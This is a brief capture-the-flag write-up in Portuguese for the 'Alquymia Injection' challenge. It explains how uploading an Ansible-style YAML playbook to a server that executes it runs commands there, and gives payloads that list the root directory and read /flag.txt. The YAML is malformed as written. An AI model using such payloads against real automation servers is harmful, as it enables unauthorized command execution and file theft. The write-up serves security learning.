Alquymia Injection


ALQ{D3v0ops_4ns1ble_pl4yb00k_Rc3}

Nesse desafio, o servidor carregava arquivos YAML e executava-os. Dessa maneira, era possível injetar códigos YAML maliciosos e obter a flag. Exemplo de código YAML:

- name: Executando comando 
- hosts: localhost
- gather_facts: no 
- tasks: 
	- name: Executar o comando ls / 
	- command: ls / 
	- register: resultado_ls 
	- 
	- name: Exibir saída do comando ls 
	- debug: 
		- var: resultado_ls.stdout_lines

Então, upando o código YAML do tipo

- name: Executando comando
- hosts: localhost
- gather_facts: no
- tasks:
	- name: Lendo a flag
	- command: cat /flag.txt
	- register: resultado_ls
 
	- name: Exibir saída da flag
	- debug:
		- var: resultado_ls.stdout_lines

Dessa maneira, é possível obter

500|center